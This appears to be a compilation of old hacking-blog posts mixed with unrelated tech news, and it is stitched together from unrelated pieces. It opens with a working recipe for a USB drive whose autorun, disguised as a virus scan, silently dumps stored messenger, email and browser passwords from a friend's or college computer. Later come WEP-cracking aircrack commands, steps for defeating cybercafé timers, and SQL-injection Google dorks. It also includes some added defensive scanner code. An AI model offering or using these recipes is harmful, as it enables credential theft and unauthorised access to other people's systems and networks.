Today I will show you how to hack passwords using a USB pen drive. As we all know, Windows stores most of the passwords that are used on a daily basis, including instant messenger passwords for MSN, Yahoo, AOL, Windows Messenger etc. Along with these, Windows also stores the passwords of Outlook Express, SMTP, POP and FTP accounts and the auto-complete passwords of browsers like IE and Firefox. Many tools exist for recovering these passwords from the places where they are stored. Using these tools and a USB pen drive you can create your own toolkit (the original post calls it a rootkit) to hack passwords from your friend's or college computer. We need the following tools to create the toolkit:
- MessenPass: recovers the passwords of the most popular instant messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
- Mail PassView: recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free. Mail PassView can also recover the passwords of web-based email accounts (HotMail, Yahoo!, Gmail) if you use the associated programs for these accounts.
- IE PassView: a small utility that reveals the passwords stored by the Internet Explorer browser. It supports the new Internet Explorer 7.0 as well as older versions of Internet Explorer, v4.0 - v6.0.
- Protected Storage PassView: recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of password-protected sites, MSN Explorer passwords, and more…
- PasswordFox: a small password recovery tool that allows you to view the user names and passwords stored by the Mozilla Firefox web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to view the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step-by-step procedure to create the password hacking toolkit. NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all 5 tools, extract them and copy only the executables (.exe files) onto your USB pen drive, i.e. copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe to your USB drive.
2. Create a new Notepad file and write the following text into it:
    [autorun]
    open=launch.bat
    ACTION= Perform a Virus Scan
Save the file and rename it from New Text Document.txt to autorun.inf. Now copy the autorun.inf file onto your USB pen drive.
3. Create another Notepad file and write the following text into it:
    start mspass.exe /stext mspass.txt
    start mailpv.exe /stext mailpv.txt
    start iepv.exe /stext iepv.txt
    start pspv.exe /stext pspv.txt
    start passwordfox.exe /stext passwordfox.txt
Save the file and rename it from New Text Document.txt to launch.bat. Copy the launch.bat file to your USB drive as well.
Now your toolkit is ready and you are all set to hack the passwords. You can use this pen drive on your friend's PC or on your college computer. Just follow these steps:
1. Insert the pen drive and the autorun window will pop up (this is because we have created an autorun pen drive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently execute in the background (this process takes hardly a few seconds). The passwords get stored in the .txt files.
4. Remove the pen drive and you'll see the stored passwords in the .txt files.
This hack works on Windows 2000, XP, Vista and 7.
NOTE: This procedure will only recover the stored passwords (if any) on the computer.
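The defensive counterpart to the procedure above is to inspect what a removable drive would do if AutoRun were honoured. The following is an added example, not code from the original post: it parses an autorun.inf, follows the launcher it points at and lists the programs that launcher would start with their arguments. The drive contents are a constructed sample that mirrors the autorun.inf and launch.bat shown above; the function names are my own. (Note that Windows 7, and XP/Vista after the February 2011 AutoRun update, no longer honour autorun.inf on USB flash drives, so the pop-up step described above depends on an unpatched or deliberately re-enabled system.)

```python
import configparser
import re

# Constructed sample of the files in the root of a removable drive. The
# autorun.inf and launch.bat contents mirror the shape described in the post;
# the .exe entries are placeholders, not real binaries.
SAMPLE_DRIVE = {
    "autorun.inf": "[autorun]\nopen=launch.bat\nACTION= Perform a Virus Scan\n",
    "launch.bat": (
        "start mspass.exe /stext mspass.txt\n"
        "start mailpv.exe /stext mailpv.txt\n"
    ),
    "mspass.exe": b"MZ-placeholder",
    "mailpv.exe": b"MZ-placeholder",
    "holiday.jpg": b"\xff\xd8",
}

# autorun.inf keys that cause something to be executed or offered for execution
LAUNCH_KEYS = ("open", "shellexecute", "shell\\open\\command")


def parse_autorun(text):
    """Return the [autorun] section of an autorun.inf as a dict with lower-cased keys."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str.lower
    cp.read_string(text)
    if "autorun" not in cp:
        return {}
    return {k: v.strip() for k, v in cp["autorun"].items()}


def launched_programs(bat_text):
    """List (executable, arguments) pairs that a launcher batch file would start."""
    progs = []
    for line in bat_text.splitlines():
        m = re.match(r"\s*(?:start\s+)?(\S+\.exe)\s*(.*)$", line, re.I)
        if m:
            progs.append((m.group(1).lower(), m.group(2).strip()))
    return progs


def assess_removable_drive(files):
    """Flag AutoRun behaviour on a drive. `files` maps file name -> contents."""
    findings = []
    inf = None
    for name, content in files.items():
        if name.lower() == "autorun.inf":
            inf = content if isinstance(content, str) else content.decode("latin-1")
    if inf is None:
        return findings  # no autorun.inf: nothing would run automatically
    entries = parse_autorun(inf)
    findings.append("autorun.inf present")
    if "action" in entries:
        # A custom ACTION label is what makes the AutoPlay dialog look like a virus scan
        findings.append("custom AutoPlay label: %r" % entries["action"])
    for key in LAUNCH_KEYS:
        if key in entries:
            target = entries[key]
            findings.append("%s= launches %s" % (key, target))
            launcher = files.get(target)
            if isinstance(launcher, str) and target.lower().endswith((".bat", ".cmd")):
                for exe, args in launched_programs(launcher):
                    findings.append("  %s runs %s %s" % (target, exe, args))
    return findings


if __name__ == "__main__":
    for line in assess_removable_drive(SAMPLE_DRIVE):
        print(line)
```

On a real system the same check is easier to apply at the policy level: the NoDriveTypeAutoRun registry value (0xFF disables AutoRun for every drive type) removes the pop-up entirely, and the presence of autorun.inf plus a .bat launcher in a drive root is a reasonable indicator for endpoint monitoring.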
Folder Lock Without Any Software: Folder Lock With Password Without Any Software. Paste the code given below into Notepad and save it as a batch file (with the extension '.bat'); any name will do. You will then see a batch file. Double-click this batch file to create a folder locker: a new folder named 'Locker' will be created at the same location. Now move all the files you want to hide into the 'Locker' folder. Double-click the batch file to lock the 'Locker' folder. If you want to unlock your files, double-click the batch file again and you will be prompted for the password. Enter the password and enjoy access to the folder. Note that the "lock" is only a rename to a Control Panel CLSID plus the hidden and system attributes, and the password sits in plain text inside the batch file, so anyone who can read the .bat file or show hidden files can get at the folder.
    @echo off
    title Folder Locker
    if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
    if NOT EXIST Locker goto MDLOCKER
    :CONFIRM
    echo Are you sure you want to lock the folder (Y/N)
    set /p "cho=>"
    if /i "%cho%"=="Y" goto LOCK
    if /i "%cho%"=="N" goto END
    echo Invalid choice.
    goto CONFIRM
    :LOCK
    ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    echo Folder locked
    goto END
    :UNLOCK
    echo Enter password to unlock folder
    set /p "pass=>"
    rem The password is stored and compared in plain text; replace the placeholder below.
    if NOT "%pass%"=="type your password here" goto FAIL
    attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
    ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
    echo Folder unlocked successfully
    goto END
    :FAIL
    echo Invalid password
    goto END
    :MDLOCKER
    md Locker
    echo Locker created successfully
    goto END
    :END
Today I'll be showing you how to grab somebody's IP address when they visit a page. The variable to use is $_SERVER['REMOTE_ADDR'], and it's that simple. You can use it for just about anything; here are a few examples.
Printing the user's IP address:
    <?php
    echo $_SERVER['REMOTE_ADDR'], " I'm Watching You!";
    ?>
Printing it to a file:
    <?php
    $ip = $_SERVER['REMOTE_ADDR'];
    $handle = fopen('ipaddresses.txt', 'a+');
    fwrite($handle, $ip);
    fwrite($handle, "\n");
    fclose($handle);
    ?>
All you have to do is make a text file, insert one of these snippets or one of your own, and save it as anythingyouwant.php. Then upload it to your website and it'll do the trick :P Keep in mind that REMOTE_ADDR is the address of the TCP peer, so behind a reverse proxy or CDN it will be the proxy's address rather than the visitor's, and that the log file should live outside the web root if you don't want it to be downloadable. The possibilities for what you can use this for are endless. Good luck :D
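The caveat above (REMOTE_ADDR is the peer, not necessarily the visitor) is where most IP-logging code goes wrong: the X-Forwarded-For header that proxies add is also something any client can set, so it may only be believed when the peer is a proxy you operate. This is an added example, not code from the original post, and it is in Python rather than PHP; the trusted-proxy ranges and all addresses are constructed for the example.

```python
import ipaddress

# Constructed: the networks our own reverse proxies / load balancers sit in.
# Only these peers are allowed to vouch for a client address via X-Forwarded-For.
TRUSTED_PROXIES = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("192.168.1.10/32"),
]


def _is_trusted(addr, trusted):
    return any(addr in net for net in trusted)


def client_ip(remote_addr, forwarded_for=None, trusted=TRUSTED_PROXIES):
    """Return the address to log as the client.

    remote_addr   -- the TCP peer (PHP's $_SERVER['REMOTE_ADDR'])
    forwarded_for -- the raw X-Forwarded-For header value, if any
    """
    # REMOTE_ADDR is set by the server, so a parse failure here is a
    # configuration bug rather than attacker input; let it raise.
    peer = ipaddress.ip_address(remote_addr)

    # An untrusted peer may say anything in X-Forwarded-For; ignore it.
    if not _is_trusted(peer, trusted) or not forwarded_for:
        return str(peer)

    # X-Forwarded-For is "client, proxy1, proxy2, ...": each hop appends the
    # address it saw.  Walk from the right and skip our own proxies; the first
    # address that is not ours is the best available client address.  Anything
    # further left was supplied by that untrusted party and is not believed.
    hops = [h.strip() for h in forwarded_for.split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return str(peer)  # malformed header: fall back to the peer
        if not _is_trusted(addr, trusted):
            return str(addr)
    return str(peer)  # every hop was one of ours; nothing better than the peer


def log_line(remote_addr, forwarded_for=None):
    """One log record; the address is normalised so it cannot carry newlines."""
    return "%s\n" % client_ip(remote_addr, forwarded_for)


if __name__ == "__main__":
    # Direct visitor: the header is ignored even though it is present.
    print(client_ip("203.0.113.5", "1.2.3.4"))
    # Visitor behind our proxy at 10.0.0.2, which appended itself after an earlier proxy.
    print(client_ip("10.0.0.2", "198.51.100.7, 10.0.0.9"))
    # A spoofed leading value is dropped; the rightmost untrusted hop wins.
    print(client_ip("10.0.0.2", "spoofed, 198.51.100.7"))
```

The same rule applies in PHP: read `$_SERVER['HTTP_X_FORWARDED_FOR']` only after checking that `$_SERVER['REMOTE_ADDR']` belongs to your proxy, and take the rightmost address you did not add yourself.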
Today we're going to learn how to disable the timer on the computers in Internet cafes. Let's go through the steps, shall we?
1. Create a New Text Document.
2. Then type CMD in it.
3. Then save it as anything.bat (make sure the file does NOT end in .txt, but in .bat).
4. Go to the location where you saved the .bat file and run it. If you've done this correctly, you'll see that Command Prompt is open.
5. Now that Command Prompt is open, type in: cd\windows (this will change the directory to Windows).
6. Then type in: regedit (this will get you to the registry editor GUI).
7. Now navigate to: HKEY_CURRENT_USER>Appevents>software>classes>microsoft>windows>current version>internet settings>policies>system
8. Then in the right pane where it says Disable Taskmanager, right-click on it, scroll down to Modify, and then change its value to "0".
9. Then open Windows Task Manager (CTRL+ALT+DELETE).
10. Then disable the Internet cafe's timer.
If you did this right, then you're done! Well done :D
India became acquainted, though maybe not willingly, with Ashok Kumar or India’s John Doe a few months before. The unimaginative name, suitably so, has taken on painful significance for Internet users. It’s on the back of an Ashok Kumar court order that Internet service providers (ISPs) have blocked torrent sites.
But also affected were legitimate video sharing sites such as Dailymotion and Vimeo. These are frequently used by creative professionals to share their commercial content.
Now, while we do not condone the use of torrent and video-sharing sites to share copyrighted content, there’s a fair case to be made that it isn’t the medium that should be punished. It is the very same medium that lets you download tonnes of copyright-free content fast and easy. So, for those who have been inconvenienced by over-zealous ISPs, here are a few tips to access such blocked content.
For example, suppose we want to access zedge.net or adf.ly shortened URLs:
Step 1 : Open the URL http://unblocksit.es
Step 2 : Provide the input of the URL you want to access and hit Go.
And it is as simple as that: you get access to any website that is blocked anywhere. This tip will work all over the world and not only in India.
You can use this to access Facebook, Twitter or any other sites which are blocked by your ISP or the local network administrator.
Hope you enjoyed the trick.
Apple has released an update for iOS 7 – iOS 7.0.2. The update fixes a bug that let users bypass the passcode security lock screen. The issue was discovered in a matter of hours after iOS 7 was released to the public.
The OS update reads, “Fixes the bug that could allow someone to bypass the lock screen passcode. Reintroduces a Greek keyboard option for passcode entry.”
The passcode on the lock screen gives you a basic level of security. When the passcode is active, no one can access the content on your phone unless they know the passcode. Bypassing the passcode on iOS 7 was a bit tricky. Users needed to open Control Center by swiping up from the bottom of the display and access the alarm clock. After that, holding the power button for a while gives the option to switch off the phone; cancel that option. After that you can double-tap the home button to bring up the multitasking menu, which gives access to the camera and stored photos along with any logged-in email and social networking accounts.
If you haven’t updated your iOS device to 7.0.2, you can do so by going into the settings option, then “General,” and selecting “Software Update.”
E-commerce marketplaces are to online sellers what shopping complexes are to retailers.
Marketplaces have not only levelled the ecommerce playing field for SMBs but also provided so much more visibility to these niche brands that are taking the online shopping industry by storm.
So naturally, when an online marketplace, let's call them ScamTag.com for the sake of argument, approached Saumya Gupta to host her brand Ten On Ten's apparel on their marketplace, she was more than stoked. With an online presence spanning from her own online store to selling on bigger marketplaces like Flipkart, Myntra and ShopClues, this was more than a welcome move.
Saumya Gupta, like so many entrepreneurs today, is the one-woman show behind her very own successful apparel brand, Ten On Ten Clothing. From scooting the bazaars of Mumbai for raw materials to taking customer calls at 2 in the night, she is CEO to customer service executive all rolled into one.
The first couple of months of tying up with ScamTag did brilliantly for Ten On Ten. Saumya was seeing a flurry of orders coming in from ScamTag and was happy about the exposure and the subsequent customer interest Ten On Ten was gathering.
Without complaint, she diligently processed the orders she received, undertook a quality check at her end to keep up with the belief that only the best should reach the customer, and never came across an unhappy customer. All was hunky dory! Until the day she asked the team at ScamTag to pay her for the orders she had processed and the stock they still had in their warehouses, which summed up to a total of Rs. 1.8 lacs, only to be denied what she had rightfully earned as an entrepreneur, even after having signed an MoU with ScamTag.
So what the hell happened?
ScamTag refused to settle all payments for Ten On Ten citing reasons like repetitive customer complaints, return of goods by the customers and products not meeting their quality checks. All of which, Saumya, was not even once informed about.
Once ScamTag refused payment to Saumya, she had no option but to take a legal recourse. And even then ScamTag.com did not straighten their act. From the company complaining to having never received the signed MoU, to managers acting as CEOs, to even going to the lengths of stalking Saumya on WhatsApp (!), they must have tried every trick in the trade to get to her to withdraw her demand for getting paid!
Finally, after haggling between their respective lawyers and many threats over a period of 3 months, the company returned Rs. 1.1 lacs in cash out of the 1.8 lacs they owed her, and returned goods worth Rs. 70,000! How is an entrepreneur supposed to react to such a scenario, other than completely giving up faith in online marketplaces?
Should you be wary of all online marketplaces?
To understand the same, a little backdrop into how marketplaces operate is needed. You see, traditional online marketplaces are nothing but a collection of online shops, much like a shopping complex. Each brand maintains its own shop and controls its own inventory. And the best part about it being, other than the low commission of around 10%-12% per sale, is that the store owner knows exactly who the customer is! They can directly interact with the customer, address concerns and redress returns accordingly.
However, in the case of marketplaces like ScamTag, they are a “shopping website that hosts flash sales”. To give you a fairer idea, such marketplaces work on the basis of purchase-order. A customer buys a product on their website and the marketplace raises a purchase order for the same. Once the brand owner, in this case Saumya, receives the purchase order, the order is processed, quality checked and sent back to ScamTag which subsequently sends it to the customer. The downside to such a model being that the store owner is never in touch with the end customer and has to rely completely on the marketplace to act as a mediator, which operates on anything around 30% to 60% commission per sale.
As a word of advice to fellow entrepreneurs, Saumya strongly suggests reading between the lines before signing MoUs of any kind and, better still, always having a lawyer look at the documents you are about to sign. And always choose wisely whom you do business with.
Even though ScamTag was a relatively new venture, Saumya saw an opportunity and went for it, only to be disappointed. Today, she has sworn off marketplaces that work on the purchase-order or flash-sales model completely, standing firmly in favour of inventory-based marketplaces, or rather selling via her own online store.
This post is not a discouragement for anyone wanting to sell on online marketplaces. On the contrary, we advise online sellers to sell on online marketplaces too, in order to get more visibility for their brand and grow their sales. But as a final word of advice, when choosing a marketplace to sell on, make sure you choose wisely and do a thorough background check on the company you're about to tie up with. Also, read all agreements very carefully and, better still, have a lawyer look at them.
Have you endured something like that? What is your take on the entire episode? Do drop in and join in the conversation in the comments below! Let this be a word of advice for all fellow entrepreneurs and e-tailers.
This post was originally published on Zepo: The eCommerce Blog for Small Businesses
Download BackTrack. It's a Linux operating system. You can download it by searching on Google; then make it bootable from USB by following the Ubuntu video on YouTube. Then it is ready to use.
TERMINAL COMMANDS:
startx
GO TO TASKBAR AND CLICK ON THE COMMAND CONSOLE ICON:
/etc/init.d/networking start
airmon-ng
CHECK THE NAME OF THE WIRELESS CARD:
airmon-ng stop [wireless card name]
airmon-ng start [wireless card name]
airmon-ng (to see the changes)
airodump-ng [wireless card name]
ctrl c
airodump-ng -w wep -c [channel number] --bssid [Bssid number] [wireless card name]
OPEN UP NEW CONSOLE:
aireplay-ng -1 0 -a [bssid] [wireless card name]
OPEN UP NEW CONSOLE:
aireplay-ng -3 -b [bssid] [wireless card name]
BRING UP 1ST CONSOLE:(run until data +30,000)
BRING UP CONSOLE SENDING/RECEIVING DATA:
ctrl c
dir
LOOK FOR FILE ENDING IN .cap
aircrack-ng [filename]
THIS WILL GIVE THE WIRELESS KEY!
Google’s highly anticipated Nexus 5 is the first smartphone with the latest Android 4.4 OS code-named KitKat.
Few phones have been preceded by so many rumors and purported leaks as Google’s latest smartphone, which was launched Thursday along with the latest version of Android. The phone, like the Nexus 4, is manufactured by LG Electronics.
The phone has a 4.95-inch full high-definition display and is available unlocked for $349. The smartphone is the “slimmest and fastest Nexus phone ever made,” wrote Sundar Pichai, senior vice president of Android, Chrome and Apps at Google, in a blog entry.
The smartphone weighs 136 grams (about 4.8 ounces) and is 8.59 millimeters (0.3 inches) thick. It has a Qualcomm Snapdragon 800 processor running at 2.3GHz and has LTE mobile connectivity, which is an important differentiator from Nexus 4, which was announced at this same time last year. The lack of LTE network technology in the Nexus 4 came as a surprise to many.
The Nexus 5 provides 17 hours of talk time and 8.5 hours of Internet browsing on a Wi-Fi network, with seven hours on an LTE network.
The Nexus 5 also has a new camera that can take sharper pictures and keep images stable. The device has an 8-megapixel rear camera and a 1.3-megapixel front camera.
“A new HDR+ mode automatically snaps a rapid burst of photos and combines them to give you the best possible single shot,” Pichai wrote.
Other features include 16GB to 32GB of storage, 2GB of RAM and a micro-USB port. It supports 802.11ac Wi-Fi wireless networking.
The smartphone is available through the Google Play store in the U.S., Canada, U.K., Australia, France, Germany, Spain, Italy, Japan and Korea, and will be coming to India “soon,” Pichai wrote.
Some software enhancements in KitKat include the “Phone” app, which makes it easier for users to access contacts and make calls. The “Hangouts” app enables videoconferencing, and also stores SMS and MMS messages. Like Motorola’s Moto X, the smartphone has the Google Now application for voice commands and search.
The Nexus family of smartphones is still deeply strategic for Google, according to Geoff Blaber, CCS Insight’s vice president of research for the Americas.
“In essence what we are seeing emerge is a two-tier strategy, with devices such as the Samsung Galaxy S4 and the HTC One with a vanilla Google experience on one end, and then at the other end the Nexus products, which are about offering strong hardware with a very aggressive price,” he said.
It’s certainly been a busy year for scammers and hackers, so we thought we’d gather together the high-profile hacks that made headlines this year. Read on for our top ten security breaches of 2013…
1. Adobe
In early October, Adobe disclosed that it was the victim of a hack that affected around 3 million users. The attackers made off with customer names, encrypted debit or credit card numbers, expiration dates, and other information relating to customer orders.
The software firm also said that “source code for numerous Adobe products” was stolen in a separate intrusion that might be linked to the theft of customer data. Later, however, Adobe admitted that the breach actually affected 38 million users. Oops.
2. Syrian Electronic Army
The Syrian Electronic Army emerged in September 2012, but it was especially busy this year targeting the social media accounts of various media outlets that the SEA believed were publishing editorials sympathetic to Syrian rebels, including the Financial Times, the New York Times, the BBC, the Guardian and even The Onion. It also managed to take the New York Times website offline in August. (Honourable mention: hacking the Jeep and Burger King Twitter feeds.)
3. Chinese hackers
In January, the New York Times revealed that it had been the target of Chinese hackers for at least four months. The intruders were reportedly looking for details about the sources that Times journalists spoke to for an October story about the wealth of Wen Jiabao, China’s prime minister.
The following month, security researchers from Mandiant traced a prolific group of computer hackers to a government-backed military unit in Shanghai, China. The firm said the People’s Liberation Army Unit 61398 is located “in precisely the same area” as APT1, an advanced persistent threat (APT) group that has stolen thousands of terabytes of data from at least 141 organizations worldwide.
4. JPMorgan
Earlier this month, JPMorgan announced that 465,000 people using prepaid cash cards issued by the bank may have had their personal data exposed in a breach. JPMorgan notified the affected cardholders, about 2 per cent of the total 25 million people who hold UCards and used the UCard Centre website between July and September. (Honourable mention: Evernote’s March breach and LivingSocial’s April hack.)
5. Zombies!
This hack was more amusing than financially devastating for users, but it did highlight a weakness in America’s emergency alert process. In February, somebody hacked into the Emergency Alert System and announced on KRTV and the CW in Montana that the zombie apocalypse was upon the good citizens of the US. The message kicked off like any other emergency alert: dial-up-esque bleeps and tones and an alert crawl across the top of the screen. But rather than warning about a weather emergency or some other plausible situation, an ominous voice came on to warn people about zombies. Rest assured that there were no zombies. Not yet, anyway.
6. US government hacks
Over in the States, the feds were not immune to crooks or hackers this year, with several government agencies falling victim to Internet attackers, including the Energy Department, the Federal Reserve, and even the social media accounts of former Secretary of State Colin Powell.
7. Zuckerberg’s wall
If you don’t have $100 (£60) to get Mark Zuckerberg’s attention, why not hack his Facebook timeline wall? That’s what Palestinian security researcher Khalil Shreateh did after he discovered a flaw in Facebook that would purportedly allow anyone to post to the Facebook wall of any other user. After Facebook ignored his warnings, he decided to take advantage of the bug and post details of it on the CEO’s Facebook wall. Facebook later fixed the glitch, but refused to give Shreateh a $500 (£300) bug bounty.
8. Apple developer website
Apple took its developer centre offline in late July, when a suspected hacker attempted to steal personal data from the corporation’s database. While the data was encrypted and “cannot be accessed,” Apple said, there were concerns that “developers’ names, mailing addresses, and/or email addresses may have been accessed.” A rebuilt version of the website came back online in mid-August.
9. Facebook plus Apple malware
In February, Facebook said its security team had discovered that Facebook’s systems were “targeted in a sophisticated attack.” It happened “when a handful of employees visited a mobile developer website that was compromised,” Facebook said. Some days later, Apple made the rare admission that it too had been the victim of hackers, attacked by the same online criminals who targeted Facebook. No customer data was stolen from either company, however.
10. Anonymous vs North Korea
In April, North Korea’s official Twitter and Flickr accounts were hacked, supposedly as part of “hacktivist” group Anonymous’ efforts to disrupt the Communist state’s web presence. The attackers targeted North Korean leader Kim Jong-un in a series of tweets and photos that depicted him in a less-than-flattering light.
Think twice before using words like ‘Bomb’, ‘Attack’, ‘Blast’ or ‘kill’ in your Facebook status updates, tweets or emails, because this may flag you as a potential terrorist under a surveillance project of Indian security agencies. According to the Economic Times, this Indian Internet surveillance project, named NETRA (Network Traffic Analysis), is capable of detecting and capturing any dubious voice traffic passing through software such as Skype or Google Talk. In Hindi, NETRA means “eye”, and the project is an Indian version of PRISM, the spying project of the US National Security Agency (NSA) that likewise allows the government to monitor the Internet and telephone records of citizens.
Reportedly, NETRA is under testing right now by the Indian Intelligence Bureau and Cabinet Secretariat and, on success, will be deployed by all Indian national security agencies. The Centre for Artificial Intelligence and Robotics (CAIR), a lab under the Defence Research and Development Organisation (DRDO), is still working hard on the ‘Netra’ project to give it extraordinary features like NSA’s PRISM. One fun fact about the project is that NETRA is specified to use only 300 GB of storage space for storing the intercepted Internet traffic… Are they serious? How is that possible? This data will be shared with at most three security agencies, including the Intelligence Bureau (IB) and Cabinet Secretariat. At this point, even I am not sure what they mean by “300 GB of storage space”, but we are trying to contact DRDO for further information on this matter.
Anyway, the NSA has a 100,000 square foot “mission critical data center”, where it intercepts 1.7 billion American electronic records and communications a day, using 5 zettabytes (1 trillion GB each) of space to keep every piece of information stored for at least the next 500 years.
Also some questions arise here that:
Do they have the capability to handle and analyze such huge amount of data? (If it is not 300GB only)
Other than terrorist attacks, will they also deal with Computer Security Incidents and vulnerabilities?
What does that 300 GB of storage space mean?
The government should clarify the objectives and capabilities of the NETRA project, because given the number of Internet users in India, words like ‘Bomb’, ‘Attack’, ‘Blast’ or ‘kill’ will trigger a RED ALARM millions of times a day, and if the agencies lack the capability to trace the genuinely malicious people among all that noise, disruptive elements may purposefully divert the attention of security agencies by various means.
Another major concern is Privacy, unwarranted digital intrusions and interference with citizens’ online communications.
Forbes India reported that, India has more than around 50 different laws, rules and regulations that aim to uphold privacy and confidentiality in various domains. Unfortunately, most of those policies are very dated and do not sufficiently take into account the challenges of contemporary information societies.
Do they believe that secrecy, confidentiality and, most importantly, privacy, must be sacrificed for national security? Bruce Schneier, security technologist said before,“There is no security without privacy. And liberty requires both security and privacy.”
Microsoft’s Twitter account was hacked by the Syrian Electronic Army just after the attacks on Xbox Twitter and Instagram, right as our calendars turned over to 2014. The Syrian Electronic Army hacked the Microsoft News Twitter account and posted a tweet stating that the company sells the user data to the government.
“Don’t use Microsoft emails(hotmail,outlook),They are monitoring your accounts and selling the data to the governments. #SEA @Official_SEA16,” the message read.
This is the second time that Microsoft’s accounts have been hacked by the Syrian Electronic Army. It had hacked Microsoft’s Xbox Twitter account and Skype’s Twitter and Facebook accounts on New Year’s Eve. Microsoft, which owns Skype, had to issue a warning to discourage people from using Microsoft emails following the New Year’s Day hack.
After attacking Microsoft’s News Twitter account, the “Official Microsoft Blog” was also hacked; it displayed SEA messages and redirected to the hacking group’s website for at least some users.
In response to the cyber attacks a Microsoft spokesperson stated, “Microsoft is aware of targeted cyber attacks that temporarily affected the Xbox Support and Microsoft News Twitter accounts. The accounts were quickly reset and we can confirm that no customer information was compromised.”
Recently the popular messaging app Snapchat was hacked and more than 4.6 million user IDs were leaked online. Snapchat has now released an updated version to prevent future attacks. The app now allows users to opt out of the ‘Find Friends’ feature that stores usernames and phone numbers. The company has even set up an email address that white-hat hackers can use to notify the company of potential exploits:
Search Engine Hacking
Search engines, by definition, are used to find and locate information on the World Wide Web. In addition to using search engines to search for information, attackers have ways of using search engines to identify and locate vulnerabilities and confidential data.
Using search engines to find vulnerabilities offers a way for attackers to probe a network without the target’s knowledge since the entire search request and response come from the search engine and not the target. The attacker doesn’t leave a footprint since he is not sending information to the target. Attackers also use a cached page to view the information, instead of accessing the site directly, which creates another layer of protection for them.
Google Hacking
Numerous books and presentations discuss how to gather “sensitive” information from Google. Attackers can use Google to gather basic information such as contact lists, internal documents, and top-level organizational structures, as well as locate potential vulnerabilities in an organization’s web application.
Attackers can use a specific type of search query, called a dork, to locate security issues or confidential data. Attackers can use dorks to obtain firewall logs and customer data, and to find ways to access an organization’s database.
Security professionals have developed public databases of dorks. Dork databases exist for several different search engines; the most common dork database is the Google Hacking Database.
Note
The Google Hacking Database (GHDB) is a great resource for finding dorks that can aid an attacker. The GHDB is located at http://johnny.ihackstuff.com/ghdb/.
Using a dork is relatively simple. An attacker locates a dork of interest, and then uses Google to search for the dork. The following code is a dork that attempts to identify web applications that are susceptible to an SQL injection vulnerability by searching for a MySQL error message that commonly signifies the existence of an SQL injection flaw:
"Unable to jump to row" "on MySQL result index" "on line"
An attacker can limit the dork to a certain domain by adding the site: directive to the query string. For example, here is a Google query that is limited to the example.com domain:
"Unable to jump to row" "on MySQL result index" "on line" site:example.com
Figure 1-4 illustrates the execution of the SQL injection dork. Notice that more than 900,000 results were returned!
Figure 1-4. Execution of an SQL injection dork
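The dork above only works because a site emits database error text into pages that a search engine then indexes. The defender's check is therefore to look for that text in your own responses before a crawler does. The following is an added example, not from the book or any tool it names: a small scanner that runs the same signatures (the page's MySQL phrases plus a few other common engines) over a set of response bodies and reports which URLs leak. The response bodies and URLs are constructed, and the function names are my own.

```python
import re

# Signatures of database error text that a search engine would index and a
# dork like the one above would find.  The first MySQL alternatives are the
# phrases from the dork itself; the rest are my additions for other engines.
ERROR_SIGNATURES = {
    "mysql": re.compile(
        r"Unable to jump to row|on MySQL result index|mysql_fetch_array\(\)"
        r"|You have an error in your SQL syntax",
        re.I,
    ),
    "mssql": re.compile(
        r"Microsoft OLE DB Provider for SQL Server|Unclosed quotation mark", re.I
    ),
    "postgres": re.compile(r"PG::SyntaxError|PostgreSQL.*?ERROR", re.I),
    # A bare PHP warning with a file path is a leak even without an SQL message.
    "php": re.compile(r"Warning:.*?\bon line \d+", re.I),
}

# Constructed sample: URL -> response body, as a crawler of our own site might
# collect them.  The second entry is the classic broken-query error page.
SAMPLE_PAGES = {
    "/products.php?id=1": "<html><body><h1>Widget</h1></body></html>",
    "/products.php?id=1'": (
        "Warning: mysql_fetch_array(): Unable to jump to row 0 on MySQL result "
        "index 3 in /var/www/products.php on line 42"
    ),
    "/search?q=x": (
        "Microsoft OLE DB Provider for SQL Server error '80040e14' "
        "Unclosed quotation mark before the character string"
    ),
}


def find_error_leaks(pages):
    """Return one record per (url, engine) whose body carries an error signature."""
    leaks = []
    for url, body in pages.items():
        for engine, pattern in ERROR_SIGNATURES.items():
            m = pattern.search(body)
            if m:
                leaks.append({"url": url, "engine": engine, "match": m.group(0)})
    return leaks


def summarize(leaks):
    """Group leak records by URL: {url: [engine, ...]} with engines sorted."""
    by_url = {}
    for rec in leaks:
        by_url.setdefault(rec["url"], []).append(rec["engine"])
    return {url: sorted(engines) for url, engines in by_url.items()}


def site_dork(domain, phrases=("Unable to jump to row", "on MySQL result index", "on line")):
    """Build the site:-restricted query from the text, to check what is already indexed."""
    return " ".join('"%s"' % p for p in phrases) + " site:%s" % domain


if __name__ == "__main__":
    for url, engines in summarize(find_error_leaks(SAMPLE_PAGES)).items():
        print("%s leaks %s error text" % (url, ", ".join(engines)))
    print(site_dork("example.com"))
```

A hit means the application is printing raw driver errors to the client; the fix is to log the detail server-side and return a generic error page, after which the indexed copy ages out. Running the same signatures over your web server's access and error logs, or over a crawl of the site, catches pages that are not linked from anywhere obvious.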
Automating Google Hacking
An attacker can use the Search Engine Assessment Tool (SEAT), developed by Midnight Research Labs, to automate Google hacking. SEAT uses search engines and search caches to search for vulnerabilities for a particular domain.
